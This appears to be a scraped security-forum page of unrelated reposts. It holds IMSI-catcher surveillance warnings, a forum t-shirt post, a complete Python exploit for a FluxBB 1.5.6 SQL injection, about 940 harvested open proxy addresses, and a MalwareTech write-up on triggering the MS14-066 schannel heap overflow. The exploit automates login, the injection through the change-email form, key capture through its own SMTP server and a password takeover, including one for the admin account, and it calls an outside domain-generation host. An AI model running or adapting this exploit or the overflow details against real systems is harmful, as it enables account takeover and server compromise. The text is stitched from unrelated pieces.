Here you can see alleged StingRay tracking devices mounted to the roof of three SUVs. The FBI or local police might deploy the device at a protest to obtain a record of everyone who attended with a cell phone. IMSI-Catchers also allow adversaries to intercept your conversations, text messages, and data.
Police can use them to determine your location, or to find out who is in a given geographic area at what time. Identity thieves might operate an IMSI-Catcher in a parked car in a residential neighborhood, stealing passwords or credit card information from people nearby who make purchases on their phones. There is more: Powerful, expensive IMSI-Catchers are in use at federal agencies and some police departments.

And if you think that IMSI-Catchers are not used in your own town, think twice! If you ever happen to be near a riot or demonstration (hint: leave your phone at home if participating), pay close attention to cars standing along the path of the demonstration - those might be IMSI-Catchers. It is common practice for police to position IMSI-Catchers at the beginning as well as the end of roads where the demonstrating crowd moves to capture and compare data in order to find out who participated. But most of the time IMSI-Catchers are well hidden and can be even body-worn - therefore you won't even discover these creepy devices. Current technology shrinks them to be as tiny as your phone! So again, if you really have to participate in a riot or demonstration, leave your phones at home or build yourself a signal blocking phone pouch!

YouTube: DEF CON 18 - Practical Cellphone Spying with Kristin Paget

Unfortunately it seems that IMSI-Catchers have been exponentially popular lately, with an explosion of various "bastards", governments and criminals all the same, using it. Anyone can now buy an IMSI-Catcher (or build a cheap one on his own). Sending spam and phishing SMS via fake base stations is already a lucrative underground market, particularly in Russia, China and Brazil (see The Mobile Cybercriminal Underground Market in China). For example in China, 1.530 people got arrested for using this kind of equipment.
Just recently, hackers decided to start reverse-engineering the NSA toolset and are releasing tools like TWILIGHTVEGETABLE - an easy to use, boot and pwn toolkit for passive monitoring of GSM communications - as well as DRIZZLECHAIR as an extension to that system on a 2TB harddrive with all the tools required to crack A5/1 as well as the rainbow tables. It's just a matter of time until your own neighbor will spy on you with simple self-built tools!

In addition, all IMSI-Catchers can crack A5/1 encryption, which is most commonly used for GSM traffic, on the fly (passively)! A5/3 encryption, which is used for securing 3G and is offered as the new security standard for GSM encryption, remains secure in practice while susceptible to theoretical attacks. Although 3G and 4G offer sufficient protection from eavesdropping, the security measures can be bypassed by IMSI-Catchers forcing a mobile device into 2G mode and downgrading encryption to A5/1 or disabling it. For further reading on the algorithms, check out the Cryptome GSM Files.

There are almost no phones on the market which offer an option to check what kind of encryption is used to secure GSM traffic. And although the Issue of not having a convenient display of the Ciphering Indicator has been assigned to Google since 2009, it seems they're getting paid (or are forced) to blatantly ignore it. Just recently, a new open source project called the "Android-CipheringIndicator-API" opened its doors to finally craft an API which fixes this Issue and merge the resulting API into the Android AOSP branch. But currently, the only way to protect a mobile device from downgrade attacks is to disable 2G if this option is available. In this case, the phone will not be able to receive or make calls in areas without 3G coverage. This is why the original author named "E:V:A" started this project. Let's detect and protect against these threats! Never think you've got "nothing to hide".
Some examples to make you familiar with current IMSI-Catcher threats:
NSA-Killings with IMSI-Catcher drones.
28c3: Defending mobile phones.
Stingrays: Biggest Technological Threat.
GSOC reveals hidden IMSI-Catcher.
Secret U.S. Spy Program on Planes.

Source: https://github.com/SecUpwN/Android-IMSI-Catcher-Detector
  11. Nytro

    T-shirt design

    Congratulations, it looks good. Hey, we on the forum would also like to make custom RST t-shirts for ourselves. Can you help us? Info: https://rstforums.com/forum/91554-tricou-rst.rst
  12. FluxBB <= 1.5.6 SQL Injection

```python
#!/usr/bin/env python
# Friday, November 21, 2014 - secthrowaway () safe-mail net
# FluxBB <= 1.5.6 SQL Injection
# make sure that your IP is reachable (the throwaway mail domain must route to it)
url = 'http://target.tld/forum/'
user = 'user'  # dummy account
pwd = 'test'

import urllib, sys, smtpd, asyncore, re, sha
from email import message_from_string
from urllib2 import Request, urlopen

ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
bindip = '0.0.0.0'


def stage1(sql):
    # Submit the injected value through the "change email" form; FluxBB then
    # mails an activation link to the address part of the new email.
    if len(sql) > 80:
        sys.exit('SQL too long, max 80 chars')
    print "1st stage: %s (%d chars)" % (sql, len(sql))
    r = urlopen(Request('%sprofile.php?action=change_email&id=%s' % (url, uid),
                        data="form_sent=1&req_new_email=%s&req_password=%s&new_email=Submit" % (urllib.quote(sql), pwd),
                        headers={"Referer": "%sprofile.php" % url, "User-agent": ua, "Cookie": cookie})).read()
    if 'An email has been sent to the specified address' not in r:
        sys.exit('err')


def stage3(key):
    # Use the activation key received by mail to complete the password change.
    print "3rd stage, using key: %s" % key
    r = urlopen(Request('%sprofile.php?action=change_pass&id=%s&key=%s' % (url, uid, key),
                        headers={"User-agent": ua})).read()
    if 'Your password has been updated' in r:
        print 'success'
    else:
        print 'err'


class stage2_smtp(smtpd.SMTPServer):
    # Minimal SMTP server that waits for the activation mail and extracts the key.
    def process_message(self, peer, mailfrom, rcpttos, data):
        print '2nd stage: got mail', peer, mailfrom, "to:", rcpttos
        key = re.search(r"(https?://.*&key=([^\s]+))",
                        message_from_string(data).get_payload(decode=True), re.MULTILINE)
        if key is not None:
            raise asyncore.ExitNow(key.group(2))
        return


def login():
    print "logging in"
    r = urlopen(Request('%slogin.php?action=in' % url,
                        data="form_sent=1&req_username=%s&req_password=%s" % (user, pwd),
                        headers={"User-agent": ua}))
    try:
        t = r.info()['set-cookie'].split(';')[0]
        return (t.split('=')[1].split('%7C')[0], t)
    except:
        sys.exit('unable to login, check user/pass')


uid, cookie = login()
email_domain = urlopen(Request('http://tns.re/gen')).read()
print "using domain: %s" % email_domain

# The "@" in the payload was rendered as " () " by the mailing-list archive;
# restored here so the value still passes as an email address.
# this will change your password to your password
stage1('%s\'/**/where/**/id=%s#@%s' % (sha.new(pwd).hexdigest(), uid, email_domain))
# this will change admin's (uid=2) password to "123456"
#stage1('%s\'/**/where/**/id=%s#@%s' % (sha.new("123456").hexdigest(), 2, email_domain))

try:
    print "2nd stage: waiting for mail"
    server = stage2_smtp((bindip, 25), None)
    asyncore.loop()
except asyncore.ExitNow, key:
    stage3(key)
```

From: secthrowaway () Safe-mail net
Date: Fri, 21 Nov 2014 02:23:30 -0500

FluxBB version 1.5.6 and below suffers from a SQL injection vulnerability. Solution: update to FluxBB 1.5.7. Working, automated PoC is attached.

Attachment: fluxbb.py

Source: Full Disclosure: FluxBB <= 1.5.6 SQL Injection
  13. [h=1]22-11-14 | VIP Socks 5 (62)[/h] Checked & filtered. Source: 22-11-14 | VIP Socks 5 (62) - Pastebin.com
  14. 22-11-14 | L1 High Anonymous Proxies (940) 22-11-14 | L1 High Anonymous Proxies (940) Checked & filtered 123.110.82.126:8088 117.147.246.90:8123 112.18.164.85:8123 182.93.236.22:8080 183.228.197.222:8123 202.114.6.37:9001 180.213.2.154:1337 112.111.114.51:9000 182.234.146.247:8088 111.10.88.235:8123 112.18.186.108:8123 218.207.28.154:8123 119.142.80.95:8585 117.173.18.95:8123 183.222.73.19:8123 111.10.155.212:8123 183.222.182.184:8123 117.176.2.125:8123 223.64.100.118:8123 183.220.198.198:8123 117.175.116.33:8123 223.18.236.163:8088 183.220.235.66:8123 183.228.196.126:8123 183.228.100.129:8123 183.249.20.60:8123 117.174.200.212:8123 183.221.186.212:8123 223.86.208.179:8123 203.172.213.246:8080 130.79.89.237:21320 111.10.101.22:8123 219.68.213.84:8088 183.220.239.167:8123 60.207.63.123:8118 117.176.191.15:8123 112.1.165.17:8123 203.172.222.230:8080 223.86.65.83:8123 1.192.62.103:8585 113.255.41.74:8088 111.9.87.226:8123 183.222.156.80:8123 111.1.3.38:8000 117.175.117.48:8123 183.223.201.147:8123 183.249.52.152:8123 117.139.35.74:8123 111.10.94.186:8123 182.235.37.111:8088 223.85.98.64:8123 183.222.152.160:8123 121.14.138.56:81 223.85.16.92:8123 183.222.172.117:8123 183.223.32.186:8123 219.239.236.49:9999 117.177.44.226:8123 223.85.18.54:8123 123.192.178.150:8088 115.28.85.240:8088 183.222.156.76:8123 117.176.188.152:8123 1.175.48.82:8088 117.173.20.43:8123 120.199.246.0:8123 203.172.209.246:8080 183.222.154.60:8123 223.86.100.43:8123 112.18.92.75:8123 183.223.168.236:8123 117.176.189.40:8123 221.225.117.192:8088 117.176.27.184:8123 1.198.227.78:9000 223.86.14.241:8123 223.86.221.25:8123 222.166.102.139:8088 183.228.36.236:8123 111.10.145.19:8123 223.64.54.95:8123 111.10.130.249:8123 221.178.21.163:8123 117.173.22.10:8123 183.222.157.209:8123 223.86.203.43:8123 223.86.135.250:8123 114.255.183.163:8080 221.178.117.213:8123 223.86.137.155:8123 183.221.217.249:8123 223.85.23.91:8123 203.172.242.190:8080 117.27.157.111:8081 59.148.110.23:8088 117.175.111.110:8123 
49.158.118.219:8088 111.10.145.165:8123 183.228.39.207:8123 183.228.238.106:8123 111.10.103.63:8123 119.246.32.164:8088 223.85.81.183:8123 183.222.152.205:8123 111.10.146.230:8123 183.223.169.195:8123 61.15.192.245:8088 223.87.75.190:8123 140.116.91.199:8088 203.172.227.45:8080 221.178.31.243:8123 111.13.55.3:22 183.221.217.130:8123 221.178.23.42:8123 61.191.27.118:1818 116.228.80.186:8080 123.101.201.123:9000 183.228.111.122:8123 59.162.204.150:8080 203.172.203.6:8080 119.80.183.2:8080 114.27.130.117:8088 117.175.101.134:8088 117.174.193.162:8123 183.228.249.182:8123 62.117.58.109:6588 112.18.166.102:8123 85.234.20.131:3128 94.232.9.242:8080 117.175.227.55:8123 183.228.41.136:8123 223.86.223.222:8123 117.175.215.199:8123 183.228.239.56:8123 183.220.244.101:8123 183.228.43.226:8123 183.219.14.137:8123 117.173.22.98:8123 183.223.157.204:8123 211.139.80.180:8080 221.10.40.237:82 122.88.143.151:8123 183.220.154.216:8123 117.176.38.48:8123 115.28.229.8:8088 111.10.131.7:8123 203.172.211.182:8080 223.85.16.104:8123 61.93.246.50:8080 220.132.129.3:8088 117.173.23.22:8123 112.18.0.101:8123 117.173.23.46:8123 183.228.89.217:8123 218.23.185.19:8080 212.42.116.148:8080 112.18.167.177:8123 123.101.201.116:9000 183.222.154.93:8123 117.175.242.116:8123 221.178.22.165:8123 223.86.65.218:8123 140.115.202.134:8088 223.86.219.3:8123 183.220.46.236:8123 111.10.191.68:8123 112.18.196.247:8123 183.228.122.229:8123 117.177.172.176:8123 117.175.118.97:8123 223.86.4.41:8123 117.175.241.120:8123 112.22.8.174:8123 182.234.152.129:8088 183.222.64.143:8123 221.178.25.156:8123 223.86.221.65:8123 111.10.166.154:8123 61.185.32.21:63000 111.10.97.200:8123 182.93.224.14:8080 117.175.241.98:8123 111.10.39.65:8123 111.9.233.17:8123 183.223.35.39:8123 203.172.211.70:8080 112.18.176.217:8123 183.223.242.172:8123 223.86.216.45:8123 112.21.232.176:8123 112.15.99.191:8123 183.228.182.157:8123 118.166.124.129:8088 221.178.23.254:8123 223.86.134.250:8123 117.139.35.231:8123 117.174.214.192:8123 
117.176.162.104:8123 115.28.11.165:8888 117.172.77.57:8123 73.152.24.102:80 183.209.236.253:8123 221.178.66.31:8123 183.223.200.142:8123 183.220.245.134:8123 183.224.99.149:8123 183.221.55.66:8123 111.243.68.137:8088 123.110.46.159:8088 183.228.151.130:8123 223.86.101.162:8123 223.85.20.11:8123 183.223.192.172:8123 171.12.1.71:81 111.185.131.85:8088 183.222.74.19:8123 117.175.39.91:8123 183.222.72.156:8123 123.101.201.6:9000 223.64.100.36:8123 223.85.21.65:8123 218.28.74.30:63000 117.139.39.98:8123 183.228.148.62:8123 218.207.11.60:8123 183.223.211.126:8123 123.195.26.231:8088 223.87.77.100:8123 183.222.155.111:8123 221.178.20.8:8123 223.85.97.240:8123 120.199.255.129:8123 223.85.23.64:8123 61.155.169.11:808 183.223.192.125:8123 123.241.50.79:8088 120.199.240.70:8123 183.228.40.127:8123 119.14.58.241:8088 203.171.227.38:8888 117.173.21.221:8123 117.139.29.47:8123 111.9.170.249:8123 112.18.168.179:8123 117.175.192.93:8123 183.222.152.110:8123 223.85.22.98:8123 112.44.234.168:8123 183.223.197.108:8123 123.195.35.100:8088 113.200.220.242:8123 223.87.114.74:8123 60.244.39.225:8088 112.44.230.216:8123 223.86.208.132:8123 114.32.219.221:8088 115.29.249.17:9000 183.222.246.137:8123 61.10.141.128:8088 112.16.78.194:8080 117.176.184.108:8123 183.227.211.79:8123 223.86.223.79:8123 140.206.86.70:8080 183.228.40.108:8123 183.228.141.4:8123 183.223.18.181:8123 221.10.40.238:82 77.70.29.176:81 218.244.138.253:808 221.178.31.130:8123 221.178.77.33:8123 112.18.194.31:8123 117.176.191.199:8123 177.223.228.1:9064 221.178.32.91:8123 140.116.101.93:8088 223.86.3.103:8123 112.18.79.182:8123 111.3.71.108:8123 182.93.241.230:8080 82.146.44.46:8080 117.173.204.147:8123 183.222.82.32:8123 222.220.187.51:8585 223.85.76.105:8123 119.246.126.158:8088 223.86.216.56:8123 183.223.155.74:8123 183.223.32.135:8123 219.153.56.22:8080 203.100.80.81:8080 123.202.145.36:8088 223.86.7.137:8123 117.174.200.120:8123 117.173.232.220:8123 117.176.189.195:8123 203.149.30.82:80 183.223.21.24:8123 
221.178.99.51:8123 117.139.34.33:8123 61.177.137.131:63000 223.85.97.171:8123 186.101.75.82:3128 111.10.119.100:8123 111.10.155.184:8123 223.85.100.160:8123 119.77.134.182:8088 183.136.221.6:3128 210.214.27.200:8080 223.86.102.57:8123 171.12.2.131:81 111.184.187.181:8088 49.158.21.212:8088 117.174.197.214:8123 111.10.44.85:8123 117.173.23.28:8123 69.10.137.139:8000 61.182.94.242:63000 183.223.10.174:8123 183.223.35.4:8123 221.10.102.199:843 218.207.11.52:8123 111.10.137.176:8123 111.10.103.175:8123 183.223.195.179:8123 190.200.17.40:21320 183.220.46.85:8123 182.93.218.30:8080 183.228.37.218:8123 111.10.133.203:8123 14.139.111.91:3128 183.228.201.236:8123 222.22.93.252:8088 183.220.245.83:8123 223.86.67.85:8123 173.201.183.172:8000 203.172.222.214:8080 221.178.98.48:8123 60.206.153.177:8118 183.228.192.141:8123 223.85.60.202:8123 111.10.164.159:8123 223.86.216.106:8123 183.223.13.19:8123 117.139.38.32:8123 121.232.13.61:8088 223.86.41.252:8123 183.223.200.77:8123 183.223.153.210:8123 183.222.153.86:8123 202.79.36.119:8080 183.220.247.200:8123 183.222.82.148:8123 210.27.237.111:8088 183.222.178.224:8123 223.86.75.224:8123 183.228.220.58:8123 111.10.158.182:8123 117.173.121.148:8123 112.44.230.36:8123 202.143.154.102:8080 183.227.253.10:8123 161.6.45.63:21320 117.173.245.203:8123 183.222.255.136:8123 223.86.44.133:8123 117.173.18.109:8123 120.199.243.29:8123 117.176.187.81:8123 218.164.150.7:8088 180.153.32.11:8080 183.223.153.13:8123 183.228.243.72:8123 112.18.176.241:8123 118.169.162.252:8088 114.24.110.5:8088 112.18.170.158:8123 111.10.49.255:8123 183.228.138.61:8123 117.172.151.57:8123 223.86.115.53:8123 218.207.12.119:8123 223.87.113.98:8123 183.228.180.247:8123 111.9.234.123:8123 60.26.60.194:8118 223.85.85.2:8123 117.173.240.220:8123 183.228.183.79:8123 223.86.46.182:8123 183.227.209.52:8123 183.222.73.52:8123 221.178.53.138:8123 120.193.60.135:8123 123.193.221.132:8088 183.220.46.113:8123 183.223.198.195:8123 117.173.62.213:8123 117.173.121.254:8123 
60.195.3.180:8118 223.85.97.96:8123 183.222.182.36:8123 218.207.208.55:8080 183.223.192.189:8123 114.40.89.234:8088 59.67.83.68:8088 223.85.83.113:8123 112.18.153.221:8123 117.173.21.14:8123 183.228.242.201:8123 117.174.195.3:8123 112.0.104.138:8123 112.0.30.84:8123 117.175.229.239:8123 183.223.21.138:8123 223.85.95.34:8123 123.101.200.185:9000 223.87.190.96:8123 117.173.20.19:8123 202.143.160.193:8080 223.85.19.121:8123 112.44.238.80:8123 113.200.220.39:8123 117.139.28.18:8123 117.174.198.230:8123 223.86.127.178:8123 111.10.155.120:8123 183.228.79.166:8123 117.173.121.177:8123 117.174.196.5:8123 223.85.21.195:8123 111.10.149.20:8123 223.86.127.126:8123 117.173.20.60:8123 183.220.45.35:8123 221.178.54.70:8123 183.222.152.142:8123 117.175.103.247:8123 42.62.24.87:8085 111.10.44.133:8123 183.223.166.13:8123 221.178.55.45:8123 112.18.161.100:8123 111.2.241.208:8123 1.193.52.246:8118 183.223.11.116:8123 85.90.222.240:12345 111.4.120.140:8123 223.87.184.97:8123 183.221.147.191:8123 111.10.155.106:8123 123.203.56.220:8088 117.173.205.160:8123 186.94.214.35:3128 91.185.110.162:21320 117.174.208.172:8123 221.178.80.217:8123 111.10.100.155:8123 112.18.160.141:8123 123.163.124.30:9000 114.38.197.137:8088 117.176.105.176:8123 183.222.172.192:8123 115.29.247.115:8888 183.223.40.63:8123 223.87.190.118:8123 188.2.107.92:21320 222.88.236.236:81 223.85.97.8:8123 112.11.48.4:8088 182.234.251.104:8088 221.10.102.203:82 117.172.78.48:8123 183.223.168.89:8123 221.178.30.190:8123 223.85.96.47:8123 182.93.236.6:8080 223.86.99.57:8123 223.86.223.40:8123 125.71.212.25:9000 223.85.98.166:8123 117.63.0.60:8118 218.95.158.99:63000 49.159.14.176:8088 1.194.8.245:808 123.193.199.41:8088 183.228.72.54:8123 60.206.239.195:8118 112.20.116.103:8123 202.103.150.70:8088 58.115.101.4:8088 112.15.33.108:8123 223.64.100.23:8123 114.255.183.173:8080 117.173.20.230:8123 117.173.242.166:8123 123.101.200.209:9000 223.86.216.249:8123 183.220.244.201:8123 118.161.57.99:8088 112.18.176.138:8123 
58.195.5.30:8088 60.191.139.18:9000 183.220.155.167:8123 112.22.252.69:8123 182.93.218.86:8080 183.223.166.223:8123 61.244.4.96:8088 112.3.166.142:8123 111.10.86.249:8123 180.153.32.9:8080 112.22.228.193:8123 223.86.210.46:8123 223.87.114.181:8123 117.175.239.23:8123 112.21.237.134:8123 183.223.20.153:8123 112.18.64.130:8123 223.85.17.108:8123 62.75.229.121:3128 221.178.117.187:8123 223.64.225.78:8123 112.44.245.141:8123 223.86.212.188:8123 183.222.153.130:8123 183.209.110.179:8123 1.170.20.142:8088 221.182.62.30:8123 180.177.194.95:8088 180.102.32.92:8118 111.10.101.185:8123 112.18.92.197:8123 183.222.182.26:8123 223.85.80.160:8123 183.228.246.55:8123 223.85.98.141:8123 183.228.241.174:8123 223.87.190.199:8123 111.10.163.178:8123 117.173.83.111:8123 183.222.155.56:8123 14.136.3.205:8088 218.252.119.131:8088 117.174.201.3:8123 117.173.22.221:8123 112.18.176.26:8123 183.230.53.78:8123 69.64.32.110:12183 183.222.155.175:8123 91.241.18.129:3129 183.228.181.58:8123 112.44.231.164:8123 183.220.247.113:8123 112.111.114.137:9000 112.18.69.249:8123 223.86.221.246:8123 60.166.19.218:63000 111.2.240.145:8123 112.18.194.217:8123 223.85.21.217:8123 112.18.162.147:8123 183.228.89.167:8123 203.172.209.190:8080 117.175.33.9:8123 218.108.168.70:82 106.0.144.6:8080 183.222.158.239:8123 183.222.173.157:8123 111.10.28.146:8123 203.172.216.126:8080 118.122.114.249:9000 183.222.156.225:8123 221.178.75.230:8123 221.182.73.193:8123 183.228.211.133:8123 221.178.31.29:8123 113.164.0.241:8080 183.222.255.183:8123 123.163.120.43:9000 202.77.138.35:8080 111.10.58.82:8123 121.52.229.51:3128 122.88.141.56:8123 202.92.173.189:8088 183.223.166.147:8123 183.228.106.15:8123 111.10.87.91:8123 117.176.184.87:8123 119.14.75.73:8088 112.18.178.43:8123 117.174.192.95:8123 203.172.149.3:8080 123.163.124.29:9000 211.77.5.41:8081 183.245.210.13:8123 117.148.38.134:8123 122.88.169.121:8123 117.139.66.218:8123 223.86.209.94:8123 70.99.146.246:7004 111.10.49.38:8123 111.10.180.195:8123 177.234.12.202:3128 
117.173.20.218:8123 183.208.39.173:8123 112.44.245.149:8123 183.221.160.83:8123 112.18.170.143:8123 183.228.183.225:8123 183.220.196.94:8123 117.173.22.139:8123 117.173.254.168:8123 183.222.252.159:8123 117.176.191.178:8123 111.10.100.182:8123 112.22.16.114:8123 117.175.35.89:8123 111.10.152.37:8123 203.172.216.6:8080 117.148.45.107:8123 211.155.86.245:8000 183.211.27.65:8123 117.173.57.179:8123 183.221.190.172:8123 211.143.146.239:82 213.135.234.6:81 60.210.111.42:8088 111.252.52.91:8088 183.223.159.170:8123 183.220.45.82:8123 59.148.166.55:8088 183.222.154.141:8123 117.173.120.85:8123 117.175.243.51:8123 196.201.216.170:8088 118.161.50.236:8088 117.147.221.157:8123 212.185.87.53:443 223.87.185.201:8123 111.10.119.3:8123 117.139.69.239:8123 183.220.168.42:8123 117.174.198.76:8123 117.174.200.220:8123 123.192.19.227:8088 111.250.170.135:8088 183.227.252.113:8123 218.35.182.54:8088 117.173.22.111:8123 218.207.16.238:8123 183.220.246.125:8123 220.134.40.139:8088 122.88.87.34:8123 58.251.78.71:8088 123.163.120.52:9000 111.39.172.53:8088 218.7.132.1:8080 183.223.172.81:8123 221.178.116.167:8123 111.20.177.46:8123 140.114.226.109:8088 111.10.13.255:8123 140.114.212.169:8088 117.173.102.45:8123 183.223.21.71:8123 183.228.43.155:8123 223.87.184.120:8123 183.228.88.2:8123 117.173.204.186:8123 98.211.196.247:3128 223.85.99.203:8123 117.177.173.119:8123 221.182.62.32:8123 221.178.78.9:8123 223.87.108.92:8123 223.85.23.231:8123 221.182.75.210:8123 222.205.127.250:8080 117.175.194.66:8123 202.143.168.150:8080 112.18.165.152:8123 83.219.21.28:8080 112.3.202.182:8123 39.187.49.24:8123 183.209.236.149:8123 183.221.189.89:8123 140.114.207.85:8088 111.9.110.248:8123 183.222.154.114:8123 183.220.246.223:8123 117.175.118.37:8123 223.64.100.24:8123 183.223.196.201:8123 14.136.61.100:8088 119.97.164.48:8085 203.172.222.38:8080 111.10.100.46:8123 183.223.193.50:8123 117.177.174.142:8123 183.221.160.58:8123 202.105.247.122:9999 111.9.87.119:8123 117.176.109.57:8123 221.178.119.225:8123 
140.114.216.105:8088 112.18.159.243:8123 221.178.86.25:8123 183.222.86.3:8123 218.14.121.227:9000 183.222.172.196:8123 111.10.97.246:8123 117.176.28.70:8123 219.68.160.90:8088 203.71.152.152:8088 210.43.139.105:8088 111.10.194.219:8123 122.88.215.160:8123 159.226.170.79:8080 183.220.196.58:8123 223.86.119.141:8123 203.172.248.198:8080 115.236.59.194:3128 221.178.122.31:8123 1.175.38.181:8088 1.172.25.3:8088 120.199.226.69:8123 117.173.62.226:8123 117.172.77.182:8123 71.230.131.198:3128 183.220.45.65:8123 183.228.78.93:8123 111.9.174.86:8123 182.234.147.27:8088 117.21.192.8:80 111.10.152.34:8123 117.190.76.46:8088 183.223.204.76:8123 112.15.15.158:8123 183.222.172.77:8123 112.111.114.204:9000 223.86.33.71:8123 180.176.131.157:8088 183.228.209.97:8123 109.197.55.7:3128 117.173.21.190:8123 183.228.234.78:8123 223.86.171.178:8123 27.207.69.232:8088 183.208.34.149:8123 140.206.86.68:8080 113.255.46.78:8088 115.43.229.26:8088 117.173.120.232:8123 183.222.152.219:8123 59.124.1.140:8088 119.236.248.42:8088 112.111.114.72:9000 123.203.77.101:8088 112.112.11.82:8080 223.86.4.207:8123 183.222.155.26:8123 221.178.119.207:8123 183.220.46.211:8123 140.116.132.20:8088 221.178.54.183:8123 112.23.249.200:8123 223.64.127.153:8123 124.11.67.64:8088 183.223.168.159:8123 39.189.100.228:8123 183.222.155.149:8123 112.18.161.122:8123 183.220.161.103:8123 222.167.62.122:8088 113.252.202.126:8088 61.187.249.231:63000 183.223.195.106:8123 183.220.46.97:8123 117.148.47.88:8123 183.221.190.222:8123 117.175.103.228:8123 221.178.96.34:8123 123.194.126.60:8088 223.86.6.181:8123 117.175.36.81:8123 221.224.163.37:9000 117.175.109.112:8123 123.163.120.50:9000 183.228.89.229:8123 42.121.105.155:8888 222.45.100.3:8080 223.86.115.154:8123 183.227.218.154:8123 183.221.217.49:8123 117.174.196.202:8123 117.175.242.222:8123 223.18.251.38:8088 221.178.14.227:8123 111.3.109.130:8123 221.10.40.236:81 58.215.212.243:63000 183.223.194.165:8123 223.86.32.119:8123 183.223.213.205:8123 183.223.242.113:8123 
182.93.236.38:8080 111.10.89.189:8123 117.10.244.241:8118 111.10.186.68:8123 125.220.10.125:8088 117.175.213.161:8123 183.228.200.140:8123 211.80.41.192:8088 223.87.76.232:8123 182.93.237.22:8080 111.2.240.170:8123 61.228.25.82:8088 183.222.101.130:8123 183.228.219.244:8123 183.228.242.153:8123 183.221.187.64:8123 117.175.36.150:8123 1.202.15.102:63000 183.245.231.190:8123 218.104.239.12:8118 183.228.193.254:8123 223.86.113.46:8123 221.178.86.204:8123 58.115.139.29:8088 117.139.65.248:8123 212.175.17.237:8080 218.207.53.196:8123 117.175.229.240:8123 123.0.254.83:8088 58.51.197.19:63000 202.115.28.113:808 223.85.98.118:8123 223.87.117.18:8123 111.10.163.97:8123 183.228.181.242:8123 115.154.225.119:8585 183.221.188.121:8123 221.178.83.79:8123 111.184.183.144:8088 112.18.160.251:8123 183.222.173.17:8123 117.175.34.232:8123 111.10.193.29:8123 117.136.166.151:8123 223.86.99.185:8123 118.26.230.75:8080 183.222.158.145:8123 119.6.136.126:82 221.178.20.249:8123 117.173.60.93:8123 118.81.149.200:8088 183.228.72.185:8123 223.86.101.25:8123 223.85.18.23:8123 117.175.124.105:8123 118.194.196.12:8080 116.228.55.217:8003 117.176.1.84:8123 183.222.173.234:8123 223.86.9.193:8123 123.203.96.106:8088 61.57.125.101:8088 117.177.173.131:8123 223.85.99.88:8123 111.10.102.242:8123 221.178.14.231:8123 117.176.162.153:8123 117.173.62.221:8123 112.24.115.214:8123 203.172.233.109:8080 114.43.20.199:8088 203.172.209.49:8080 183.220.46.25:8123 218.35.144.218:8088 119.6.144.70:843 111.10.195.229:8123 182.234.73.217:8088 137.135.166.225:8118 61.155.11.39:9999 219.68.190.87:8088 123.101.194.69:9000 111.10.98.195:8123 183.222.158.92:8123 210.212.245.236:8080 218.207.28.185:8123 111.185.178.5:8088 111.10.138.75:8123 183.228.235.214:8123 202.102.201.99:8080 123.163.120.35:9000 182.93.229.66:8080 182.93.235.118:8080 203.172.149.155:8080 111.10.100.35:8123 211.77.5.38:8081 58.118.216.201:8088 221.178.30.238:8123 223.87.190.26:8123 183.228.103.50:8123 117.175.228.9:8123 124.12.87.119:8088 
183.228.78.4:8123 223.86.217.123:8123 112.44.252.46:8123 218.207.17.82:8123 183.220.228.19:8123 223.85.60.74:8123 183.221.160.243:8123 117.175.116.78:8123 223.85.20.254:8123 80.232.255.197:21320 183.222.159.114:8123 117.173.81.168:8123 111.3.78.103:8123 121.55.204.80:8088 183.228.39.8:8123 183.223.12.202:8123 111.10.194.100:8123 223.86.101.160:8123 117.177.166.246:8123 221.178.65.197:8123 223.85.21.235:8123 5.9.70.75:8118 112.15.64.133:8123 182.118.3.228:8888 223.86.117.33:8123 171.12.2.133:81 183.228.232.72:8123 182.93.218.78:8080 221.178.21.198:8123 58.199.150.21:8585 221.215.150.116:8080 117.149.253.1:8123 183.223.203.141:8123

Source: 22-11-14 | L1 High Anonymous Proxies (940) - Pastebin.com
  15. [h=3]MS14-066 In Depth Analysis[/h]

A few days ago I published an article detailing how a second bug, in the schannel TLS handshake handling, could allow an attacker to trigger the DecodeSigAndReverse heap overflow in an application that doesn't support client certificates. I had stated I was not familiar with ECC signatures and was unsure of how to trigger the exploit; however, a few hours of research fixed that. BeyondTrust's post implies they triggered the overflow by randomly modifying the ECC signature, though I believe this is unlikely and was just a safer alternative to disclosing exactly how to trigger the exploit. It was possible for me to achieve remote code execution with either ASLR or DEP disabled, but on a system with both it would prove quite a challenge, thus I'm not too worried about detailing exactly how to trigger the overflow.

[h=2]DecodeSigAndReverse[/h]

We already know the function in which the overflow occurs, so I decided to work backwards from there. This function is responsible for decoding the ASN.1 (DER) encoded ECC signature and returning it to be verified. The first thing that is done here is that the ECC signature is passed to CryptDecodeObject in order to calculate the total size of the decoded signature, which is used to allocate some memory using SPExternalAlloc (a LocalAlloc wrapper). CryptDecodeObject will always handle the signature correctly, with the returned size being sufficient. CryptDecodeObject is now called again, but this time it is passed a pointer to the allocated memory in which to copy the decoded signature. The "cmp ebx, 2Fh" checks the signature type (X509_ECC_SIGNATURE) and will direct the code to the left. The decoded signature is pointed to by an ECC_SIGNATURE header, which is 12 bytes in size and looks something like this. What R and S are doesn't really matter here; all we need to know is that they are extremely large integers. Our ECC structure now contains the size of each integer and a pointer to where it's stored.

The 2 memcpy operations should be pretty obvious now: the first one copies rSize bytes from R to some allocated memory, then the second copies sSize bytes of S to the same memory directly after R; if there's going to be an overflow, it's going to be in the second memcpy. What we don't yet know is the size of the destination memory or how it's allocated. All I had to do to find where the memory gets allocated was to look at the call graph, find the function responsible for calling DecodeSigAndReverse, then scout it for the "Dst" parameter. This is where everything goes right (or wrong if you're Microsoft). _BCryptGetProperty is being passed "KeyLength" to... drum roll please... get the key length. Directly below that, the length is being divided by 8 (converted from bits to bytes) then doubled; this is due to the fact that the signature length is (should be) double the key length. Just before the call to DecodeSigAndReverse we can see that the destination buffer is also allocated on the heap.

So back at the 2 memcpys, now with knowledge of the destination buffer size, we can see exactly what triggers the heap overflow. If we use a key size of 256 bits (32 bytes), then the function is expecting a 512 bit (64 byte) signature; any more will overflow the heap and, when it's freed, cause a crash. There are very few constraints on the signature, due to the fact that the whole thing is just 2 massive integers. As long as we maintain a valid ASN.1 (DER) encoding and the signature is of valid size, we can write arbitrary data to the heap header, resulting in an access violation or even remote code execution when the system tries to free the memory.

Posted by TM at 11:19 AM

Source: MS14-066 In Depth Analysis - MalwareTech
